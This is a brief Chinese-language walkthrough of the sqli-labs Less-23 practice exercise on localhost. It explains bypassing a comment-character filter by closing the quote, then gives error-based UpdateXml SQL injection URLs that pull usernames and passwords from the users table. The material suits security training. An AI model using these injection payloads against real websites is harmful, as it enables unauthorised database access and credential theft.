、
加单引号报错

加#
http://localhost/sqli-labs-master/Less-23/?id=1'%23
错误没有改变,推测过滤了#
查看源码发现# -- 都被替换掉了

那么可用通过闭合单引号的方式
http://localhost/sqli-labs-master/Less-23/?id=1' and '1'='1

然后通过UpdateXml函数利用报错取数据
http://localhost/sqli-labs-master/Less-23/?id=1' and UpdateXml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1)='1

http://localhost/sqli-labs-master/Less-23/?id=1' and UpdateXml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)='1
